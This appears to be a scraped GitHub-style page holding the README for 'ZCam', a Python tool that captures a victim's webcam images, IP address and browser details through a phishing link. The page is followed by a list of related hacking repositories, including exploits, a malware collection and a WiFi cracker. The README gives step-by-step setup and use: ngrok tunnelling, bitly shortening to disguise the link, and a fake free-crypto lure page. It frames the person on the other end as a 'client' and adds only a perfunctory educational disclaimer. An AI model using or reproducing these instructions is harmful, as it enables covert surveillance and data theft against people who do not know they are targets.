The First Python Compatible Camera Hacking Tool

Overview

ZCam

Hack webcam using python by sending malicious link.

logo

FEATURES :

  • [+] Real-time Camera hacking
  • [+] Python compatible
  • [+] URL Shortener using bitly [V 2.0]
  • [+] Less Size
  • [+] Updated regularly

TESTED ON :

  • Ubuntu
  • Kali Linux
  • Termux

INSTALLATION :

  • Install any Python 3.x version
  • Make sure you are using pip of Python3, to check pip --version
  • git clone https://github.com/sankethj/z-cam
  • pip install -r requirements.txt

HOW TO USE :

  • You need to signup in Bitly and get your access token in API session
  • Now in the project directory there is a file called tokensbitly.py, in that replace your_token with your access token
  • After running the script, it will ask if you want to shorten the ngrok link type y or else type n
  • you will be provided with ngrok tunnel link with or without shortened depending on what yoy have choosen
  • Send that link to Client
  • Cam Images will be stored in the directory called capture.
  • Captured Cam Image will be saved in the format of img_ .png
  • Clients' ip address, User-Agent (system, browser) details and it will be saved in the file called myfile.txt
  • Make sure you use Wifi or Hotspot turned ON while using this tool.

USAGE :

  • python3 zcam.py
  • First time while running the tool, you need to start and test yourself. Most of time due to some problem in flask it wont take images properly. After getting tunneling link quit the program and start it again. It will work fine definitely.

CONCEPT :

  • This tool is Python compatible
  • It uses Flask to host web-server
  • If you go through the code, there is both GET and POST requests made.
  • GET request will provide you the Clients' ip address, User-Agent details and it will be saved in the file called myfile.txt
  • POST request will provide you the Clients' Base64 encoded Cam image data and it will be decrypted and stored as image file in capture directory
  • I used pyngrok (the wrapper of ngrok), to create https tunnel and bitly to shorten the tunneled URL

SCREENSHOTS :

  • Replace with your bitly access token here

token

  • Working of zcam.py

tool1

  • Captured Cam image files

tool2

  • A Sample crypto webpage which attract more client for free crypto

webpage

  • Files stored

files

YOUTUBE :

YOUTUBE

CONTACT :

Telegram Twitter

REFERENCES :

  • Musa
  • Saycheese (thelinuxchoice)

WARNING :

This tool is only for educational purposes. If you use this tool for other purposes except educational we will not be responsible in such cases.

Owner
Sanketh J
@Team_ETF
Sanketh J
A set of blender assets created for the $yb NFT project.

fyb-blender A set of blender assets created for the $yb NFT project. Install just as you would any other Blender Add-on (via Edit-Preferences-Add-on

Pedro Arroyo 1 May 06, 2022
Mad Spammer is a python webhook spammer which is very easy and safe to use.

Mad Spammer 👿 Pre-Setup: Open your terminal/console and type: pip install module colorama python MadSpammer.py Setup: After doing that, you should be

1 Nov 26, 2021
Lightweight and beneficial Dependency Injection plugin for apscheduler

Implementation of dependency injection for apscheduler Prerequisites: apscheduler-di solves the problem since apscheduler doesn't support Dependency I

Glib 11 Dec 07, 2022
Moodle community-based vulnerability scanner

badmoodle Moodle community-based vulnerability scanner Description badmoodle is an unofficial community-based vulnerability scanner for moodle that sc

Michele Di Bonaventura 11 Dec 22, 2022
Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP

258 Jan 02, 2023
Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify

Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify

DW Dariel 5 Dec 03, 2022
I hacked my own webcam from a Kali Linux VM in my local network, using Ettercap to do the MiTM ARP poisoning attack, sniffing with Wireshark, and using metasploit

plan I - Linux Fundamentals Les utilisateurs et les droits Installer des programmes avec apt-get Surveiller l'activité du système Exécuter des program

148 Dec 22, 2022
This repository is one of a few malware collections on the GitHub.

This repository is one of a few malware collections on the GitHub.

Andrew 1.7k Dec 28, 2022
The Devils Eye is an OSINT tool that searches the Darkweb for onion links and descriptions that match with the users query without requiring the use for Tor.

The Devil's Eye searches the darkweb for information relating to the user's query and returns the results including .onion links and their description

Richard Mwewa 135 Dec 31, 2022
A collection of write-ups and solutions for Cyber FastTrack Spring 2021.

IMPORTANT: Please contact us before you use any styling or content shown here! Cyber FastTrack Spring 2021 / National Cyber Scholarship Competition -

Alice 48 Aug 28, 2022
🔍 IRIS: An open-source intelligence framework

IRIS is an open-source OSINT framework, consisting of modules to find information about a target by scraping sites and fetching data from APIs.

IRIS 79 Dec 20, 2022
Exploit-CVE-2021-21086

CVE-2021-21086 Exploit This exploit allows to execute a shellcode in the context of the rendering process of Adobe Acrobat Reader DC 2020.013.20074 an

Faraday 23 Nov 09, 2022
🍯 16 honeypots in a single pypi package (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, STMP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres & MySQL)

Easy to setup customizable honeypots for monitoring network traffic, bots activities and username\password credentials. The current available honeypot

QeeqBox 259 Dec 31, 2022
MayorSec DNS Enumeration Tool

MayorSecDNSScan MSDNSScan is used to identify DNS records for target domains and check for zone transfers. There really isn't much special about it, a

Joe Helle 68 Dec 12, 2022
an impacket-dependent script exploiting CVE-2019-1040

dcpwn an impacket-dependent script exploiting CVE-2019-1040, with code partly borrowed from those security researchers that I'd like to say thanks to.

QAX A-Team 71 Nov 30, 2022
This repository uses a mixture of numbers, alphabets, and other symbols found on the computer keyboard

This repository uses a mixture of numbers, alphabets, and other symbols found on the computer keyboard to form a 16-character password which is unpredictable and cannot easily be memorised.

Mohammad Shaad Shaikh 1 Nov 23, 2021
A knockoff social-engineer toolkit

The Python SE Dopp Kit is a social engineering toolkit with many purposes. It contains 5 different modules designed to be of assistance in different s

48 Nov 26, 2022
Ducky Script is the payload language of Hak5 gear.

Ducky Script is the payload language of Hak5 gear. Since its introduction with the USB Rubber Ducky in 2010, Ducky Script has grown in capability while maintaining simplicity. Aided by Bash for logic

Abir Abedin Khan 6 Oct 07, 2022
A GitHub action for organizations that enables advanced security code scanning on all new repos

Advanced-Security-Enforcer What this repository does This code is for an active GitHub Action written in Python to check (on a schedule) for new repos

Zack Koppert 30 May 17, 2022
This program is a WiFi cracker, you can test many passwords for a desired wifi to find the wifi password!

WiFi_Cracker About the Program: This program is a WiFi cracker! Just run code and select a desired wifi to start cracking 💣 Note: you can use this pa

Sina.f 13 Dec 08, 2022